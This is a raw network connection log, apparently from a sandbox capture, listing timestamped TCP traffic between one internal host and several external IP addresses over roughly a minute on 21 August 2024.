                                      Aug 21, 2024 10:57:39.501210928 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.501368999 CEST44359972162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:39.501429081 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:39.501883984 CEST59972443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:42.103759050 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.108768940 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.108885050 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.109543085 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.114348888 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.953701973 CEST276435997345.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:42.953804016 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:42.953996897 CEST5997327643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:44.301940918 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.306934118 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:44.307017088 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.307351112 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:44.312346935 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:44.516002893 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516050100 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.516141891 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516426086 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.516441107 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.980123997 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:44.981347084 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:44.981369019 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127501965 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127593040 CEST44359975162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:45.127631903 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:45.128249884 CEST59975443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:46.001390934 CEST480559974135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:46.001600027 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:46.001828909 CEST599744805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:47.963668108 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.972677946 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:47.972758055 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.973298073 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:47.978104115 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:48.789632082 CEST276435997645.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:48.789741039 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:48.790159941 CEST5997627643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:49.610429049 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.617674112 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:49.617748976 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.617980957 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.618021965 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:49.622734070 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:49.622802019 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.134686947 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.134728909 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.134805918 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.135078907 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.135091066 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.304039955 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.318002939 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.318109035 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.322840929 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.322973967 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.751966000 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.753838062 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.755707026 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.755723953 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.877175093 CEST8059977188.40.141.211192.168.2.4
                                      Aug 21, 2024 10:57:50.877230883 CEST5997780192.168.2.4188.40.141.211
                                      Aug 21, 2024 10:57:50.895236969 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.895301104 CEST44359978162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:50.895351887 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:50.895847082 CEST59978443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:51.010175943 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.015106916 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:51.015180111 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.015455961 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:51.020684958 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:52.018727064 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:52.018791914 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:52.018881083 CEST5996780192.168.2.451.178.186.149
                                      Aug 21, 2024 10:57:52.024928093 CEST805996751.178.186.149192.168.2.4
                                      Aug 21, 2024 10:57:52.284435034 CEST5996580192.168.2.4172.67.133.215
                                      Aug 21, 2024 10:57:52.704793930 CEST480559979135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:52.704888105 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:52.705101967 CEST599794805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:52.783716917 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.783806086 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.783950090 CEST5996880192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.785598040 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.788767099 CEST805996845.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.790397882 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:52.790494919 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.790793896 CEST5998080192.168.2.445.9.20.13
                                      Aug 21, 2024 10:57:52.795676947 CEST805998045.9.20.13192.168.2.4
                                      Aug 21, 2024 10:57:53.807271957 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.812330961 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:53.812402964 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.812706947 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:53.817740917 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:54.631992102 CEST276435998145.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:54.632060051 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:54.632527113 CEST5998127643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:55.900662899 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.900703907 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:55.900788069 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.901031971 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:55.901046038 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.386512041 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.387732029 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:56.387758017 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540587902 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540673971 CEST44359983162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:57:56.540923119 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:56.541388988 CEST59983443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:57:57.712759972 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.718018055 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:57.718110085 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.718367100 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:57.727309942 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:59.423563004 CEST480559985135.181.129.119192.168.2.4
                                      Aug 21, 2024 10:57:59.423701048 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:59.423942089 CEST599854805192.168.2.4135.181.129.119
                                      Aug 21, 2024 10:57:59.654083014 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:59.658943892 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:57:59.659018040 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:59.659255028 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:57:59.664062977 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:00.475445032 CEST276435998745.142.215.47192.168.2.4
                                      Aug 21, 2024 10:58:00.475512028 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:00.475733042 CEST5998727643192.168.2.445.142.215.47
                                      Aug 21, 2024 10:58:01.556212902 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556246996 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:01.556307077 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556651115 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:01.556660891 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.028017998 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.029577017 CEST59988443192.168.2.4162.159.130.233
                                      Aug 21, 2024 10:58:02.029592037 CEST44359988162.159.130.233192.168.2.4
                                      Aug 21, 2024 10:58:02.177293062 CEST44359988162.159.130.233192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Aug 21, 2024 10:58:02.177359104 CEST  443          59988      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:02.177407980 CEST  59988        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:02.177923918 CEST  59988        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:04.431967020 CEST  59989        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:04.437063932 CEST  4805         59989      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:04.437165022 CEST  59989        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:04.437510967 CEST  59989        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:04.442303896 CEST  4805         59989      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:05.478270054 CEST  59990        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:05.483284950 CEST  27643        59990      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:05.483414888 CEST  59990        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:05.483633995 CEST  59990        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:05.488392115 CEST  27643        59990      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:06.144723892 CEST  4805         59989      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:06.144783974 CEST  59989        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:06.145009995 CEST  59989        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:06.300348997 CEST  27643        59990      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:06.303158998 CEST  59990        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:06.303361893 CEST  59990        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:07.181252956 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:07.181289911 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.181516886 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:07.181710958 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:07.181720972 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.649286985 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.651585102 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:07.651601076 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.797528028 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.797586918 CEST  443          59991      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:07.797676086 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:07.798480034 CEST  59991        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:11.150417089 CEST  59992        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:11.155499935 CEST  4805         59992      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:11.155648947 CEST  59992        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:11.155895948 CEST  59992        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:11.161065102 CEST  4805         59992      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:11.307375908 CEST  59993        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:11.312268019 CEST  27643        59993      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:11.312344074 CEST  59993        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:11.312571049 CEST  59993        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:11.317365885 CEST  27643        59993      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:12.140379906 CEST  27643        59993      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:12.143167019 CEST  59993        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:12.175671101 CEST  59993        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:12.806133032 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:12.806174994 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:12.806452990 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:12.806898117 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:12.806907892 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:12.845339060 CEST  4805         59992      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:12.846466064 CEST  59992        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:12.846560001 CEST  59992        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:13.297887087 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:13.299146891 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:13.299165010 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:13.448107004 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:13.448178053 CEST  443          59994      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:13.448220015 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:13.448762894 CEST  59994        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:14.158622026 CEST  80           59980      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:14.158761978 CEST  59980        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:14.158828020 CEST  59980        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:14.163603067 CEST  80           59980      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:14.179116964 CEST  59995        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:14.183954954 CEST  80           59995      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:14.184052944 CEST  59995        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:14.184186935 CEST  59995        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:14.188999891 CEST  80           59995      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:17.181680918 CEST  59996        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:17.187391996 CEST  27643        59996      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:17.187489986 CEST  59996        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:17.187861919 CEST  59996        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:17.192785978 CEST  27643        59996      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:17.853481054 CEST  59997        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:17.858561993 CEST  4805         59997      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:17.859172106 CEST  59997        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:17.859399080 CEST  59997        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:17.864713907 CEST  4805         59997      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:18.004283905 CEST  27643        59996      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:18.004379988 CEST  59996        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:18.005070925 CEST  59996        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:18.530860901 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:18.530905962 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:18.530987978 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:18.531327009 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:18.531337023 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:18.995027065 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:18.996530056 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:18.996545076 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:19.125052929 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:19.125113010 CEST  443          59998      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:19.125169039 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:19.126126051 CEST  59998        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:19.568169117 CEST  4805         59997      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:19.568264008 CEST  59997        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:19.568528891 CEST  59997        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:23.010978937 CEST  59999        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:23.015889883 CEST  27643        59999      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:23.016118050 CEST  59999        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:23.016338110 CEST  59999        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:23.021033049 CEST  27643        59999      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:23.835954905 CEST  27643        59999      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:23.836036921 CEST  59999        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:23.836369038 CEST  59999        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:24.135682106 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:24.135710955 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.135797024 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:24.136161089 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:24.136173964 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.573268890 CEST  60001        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:24.586504936 CEST  4805         60001      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:24.586760998 CEST  60001        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:24.587079048 CEST  60001        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:24.594841957 CEST  4805         60001      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:24.626379013 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.627722025 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:24.627748966 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.786770105 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.786818981 CEST  443          60000      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:24.786876917 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:24.787602901 CEST  60000        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:26.213013887 CEST  59995        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:26.218106985 CEST  60002        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:26.223002911 CEST  80           60002      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:26.223076105 CEST  60002        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:26.223206043 CEST  60002        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:26.227988005 CEST  80           60002      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:26.302488089 CEST  4805         60001      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:26.302586079 CEST  60001        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:26.302798033 CEST  60001        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:28.853616953 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:28.858661890 CEST  27643        60003      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:28.858733892 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:28.862416983 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:28.867814064 CEST  27643        60003      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:29.790585995 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:29.790652037 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:29.790803909 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:29.791047096 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:29.791063070 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:29.960613966 CEST  27643        60003      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:29.960696936 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:29.961293936 CEST  27643        60003      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:29.961340904 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:29.961550951 CEST  60003        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:30.420119047 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:30.421269894 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:30.421298027 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:30.595546007 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:30.595613956 CEST  443          60004      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:30.595792055 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:30.596164942 CEST  60004        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:31.306992054 CEST  60005        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:31.311883926 CEST  4805         60005      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:31.311954975 CEST  60005        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:31.312196970 CEST  60005        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:31.316953897 CEST  4805         60005      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:33.002342939 CEST  4805         60005      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:33.003406048 CEST  60005        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:33.003546000 CEST  60005        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:34.229228973 CEST  60002        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:34.232709885 CEST  60006        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:34.237670898 CEST  80           60006      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:34.238012075 CEST  60006        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:34.238300085 CEST  60006        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:34.243084908 CEST  80           60006      45.9.20.13       192.168.2.4
Aug 21, 2024 10:58:34.978951931 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:34.983963013 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:34.987284899 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:34.987456083 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:34.993334055 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:35.603526115 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:35.603564978 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:35.603847980 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:35.604198933 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:35.604212999 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:35.912823915 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:35.913026094 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:35.913260937 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:36.960246086 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:36.960484028 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:36.961225986 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:36.961383104 CEST  27643        60007      45.142.215.47    192.168.2.4
Aug 21, 2024 10:58:36.961462021 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:36.961462021 CEST  60007        27643      192.168.2.4      45.142.215.47
Aug 21, 2024 10:58:36.962760925 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:36.964195967 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:36.964231968 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:37.113914013 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:37.113981009 CEST  443          60008      162.159.130.233  192.168.2.4
Aug 21, 2024 10:58:37.114322901 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:37.118156910 CEST  60008        443        192.168.2.4      162.159.130.233
Aug 21, 2024 10:58:38.010507107 CEST  60009        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:38.015350103 CEST  4805         60009      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:38.015414000 CEST  60009        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:38.015980959 CEST  60009        4805       192.168.2.4      135.181.129.119
Aug 21, 2024 10:58:38.021224022 CEST  4805         60009      135.181.129.119  192.168.2.4
Aug 21, 2024 10:58:38.243340969 CEST  60006        80         192.168.2.4      45.9.20.13
Aug 21, 2024 10:58:38.249599934 CEST  60010        80         192.168.2.4      45.9.20.13
